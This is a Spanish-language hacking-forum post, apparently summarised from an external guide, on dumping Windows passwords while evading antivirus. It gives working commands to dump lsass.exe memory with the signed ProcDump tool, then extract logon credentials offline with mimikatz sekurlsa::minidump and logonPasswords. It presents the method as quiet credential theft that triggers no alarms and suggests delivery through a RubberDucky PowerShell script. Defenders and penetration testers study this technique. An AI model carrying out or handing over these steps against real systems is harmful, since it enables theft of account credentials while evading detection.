Bienvenidos al nuevo foro de hackplayers. En caso de encontrarse cualquier tipo de error, contacte con cualquier administrador por mensaje privado.
Recuerda que, para incrementar tu privacidad, tambien puedes acceder al foro usando el dominio forohpysho2t5mjs.onion de la red tor.

Dumpeando contraseñas en Windows sin mimikatz

Últimamente se habla muchísimo de mimikatz, y con razón.

También con razón los sistemas de antivirus lo etiquetan como virus, porque si mimikatz llega a tu sistema es muy probable que no sea intencionadamente.

Se buscan formas de evadir los antivirus. Se hacen herramientas para matarlos, se cifran los ejecutables, se roban firmas de otro ejecutable, se ejecuta mediante transformaciones y muchas perrerías más, pero clavar un mimikatz en un sistema 0day sigue siendo un dolor de cabeza.

Así que la mejor opción es no usar mimikatz en la máquina objetivo. Nos resulta más útil ProcDump de SysInternals.

ProcDump está firmado por M$ que ningún AV marca como virus.

Así que con ProcDump (Y con privilegios de Administrador), podemos hacer un dump de lsass.exe y luego usar el minidump para obtener las credenciales.

procdump64.exe -accepteula -ma lsass.exe %COMPUTERNAME%_lsass.dmp
Con ésto obtenemos un archivo con el nombre del equipo_lsass.dmp. Este archivo nos lo llevamos a nuestro lab y allí ya podemos darle las vueltas que queramos con mimikatz.
mimikatz # sekurlsa::minidump lsass.dmp
Switch to minidump
mimikatz # sekurlsa::logonPasswords
<....>

Y con esto tenemos el trabajo hecho sin disparar ninguna alarma. Un trabajo limpio que, si lo ejecutamos con algún tipo de script en PowerShell cargado con un RubberDucky, podríamos llamar quirúrgico.

Fuente: https://www.onlinehashcrack.com/how-to-procdump-mimikatz-credentials.php

PD: Los Captchas de este foro serán su fin.
---
  Hoy no se fía, vuelva mañana.
#NoMoreCaptchas #IWannaBeARobot
Accede o Regístrate para comentar.